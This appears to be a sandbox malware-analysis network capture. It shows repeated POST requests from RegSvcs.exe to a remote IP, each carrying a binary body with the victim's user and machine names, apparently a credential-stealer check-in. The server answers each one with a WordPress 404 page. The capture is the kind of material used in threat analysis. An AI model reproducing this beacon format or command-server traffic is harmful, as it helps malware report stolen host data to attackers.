                                            May 29, 2024 15:44:33.775239944 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                                            Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                                            May 29, 2024 15:44:33.775244951 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                                            Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
                                            May 29, 2024 15:44:33.775252104 CEST1236INData Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75
                                            Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            56192.168.2.94977145.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:44:33.942472935 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:44:33.947452068 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:44:36.461035967 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:44:34 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:44:36.461050034 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:44:36.461067915 CEST448INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                                            May 29, 2024 15:44:36.461074114 CEST1236INData Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72
                                            Data Ascii: "DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.support
                                            May 29, 2024 15:44:36.461078882 CEST1236INData Raw: 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d
                                            Data Ascii: pemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: no
                                            May 29, 2024 15:44:36.461085081 CEST448INData Raw: 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77
                                            Data Ascii: -color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color
                                            May 29, 2024 15:44:36.462357998 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:44:36.462392092 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                                            May 29, 2024 15:44:36.462402105 CEST1236INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                                            Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                                            May 29, 2024 15:44:36.462408066 CEST672INData Raw: 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b
                                            Data Ascii: ar(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            57192.168.2.94977245.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:44:36.658231020 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:44:36.665555954 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:44:39.150901079 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:44:37 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:44:39.150947094 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:44:39.150949955 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                                            May 29, 2024 15:44:39.150960922 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                                            Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                                            May 29, 2024 15:44:39.150968075 CEST896INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                                            Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                                            May 29, 2024 15:44:39.151000977 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:44:39.151032925 CEST224INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--w
                                            May 29, 2024 15:44:39.151041031 CEST1236INData Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73
                                            Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5
                                            May 29, 2024 15:44:39.151058912 CEST224INData Raw: 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63
                                            Data Ascii: --black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset-
                                            May 29, 2024 15:44:39.151417017 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                                            Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            58192.168.2.94977345.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:44:39.311748028 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:44:39.317655087 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:44:41.853147984 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:44:39 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:44:41.853173018 CEST224INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
                                            May 29, 2024 15:44:41.853192091 CEST1236INData Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30
                                            Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
                                            May 29, 2024 15:44:41.853204012 CEST1236INData Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f
                                            Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
                                            May 29, 2024 15:44:41.853230000 CEST1236INData Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d
                                            Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
